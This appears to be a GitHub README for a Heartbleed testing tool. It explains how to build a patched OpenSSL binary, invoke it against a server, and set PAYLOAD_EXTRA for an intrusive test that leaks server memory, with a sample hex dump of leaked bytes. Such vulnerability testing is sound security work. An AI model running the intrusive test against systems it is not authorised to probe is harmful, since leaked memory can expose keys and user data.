heartbleed
Folders and files
Name | Name | Last commit date | ||
---|---|---|---|---|
parent directory.. | ||||
Patch OpenSSL and compile. The resulting openssl binary will be in the apps/ subdirectory. It's best that you rename it (e.g., to openssl-heartbleed) and copy somewhere else. With PAYLOAD_EXTRA set to 16 (the default), the test is non-invasive and won't return any server data. If you want to use an instrusive test (which is necessary to differentiate vulnerable OpenSSL from non-vulnerable GnuTLS), increase the value. | NOTE Use only on systems that you are allowed to test. Under | no circumstances test systems for which you have no permission. To test, invoke the patched version of OpenSSL, type B and press RETURN: $ ./openssl-heartbleed s_client -connect www.example.com:443 -msg A server that doesn't respond isn't vulnerable. A server that returns more data than it receives is vulnerable. This is an example of a server returning 16 bytes of server data (equivalent of setting PAYLOAD_EXTRA to 32): --- B HEARTBEATING >>> TLS 1.2 [length 0025], HeartbeatRequest 01 00 32 00 00 7c e8 f5 62 35 03 bb 00 34 19 4d 57 7e f1 e5 90 6e 71 a9 26 85 96 1c c4 2b eb d5 93 e2 d7 bb 5f <<< TLS 1.2 [length 0045], HeartbeatResponse 02 00 32 00 00 7c e8 f5 62 35 03 bb 00 34 19 4d 57 7e f1 e5 90 6e 71 a9 26 85 96 1c c4 2b eb d5 93 e2 d7 bb 5f 6f 81 0f aa dc e0 47 62 3f 7e dc 60 95 c6 ba df c9 f6 9d 2b c8 66 f8 a5 45 64 0b d2 f5 3d a9 ad read R BLOCK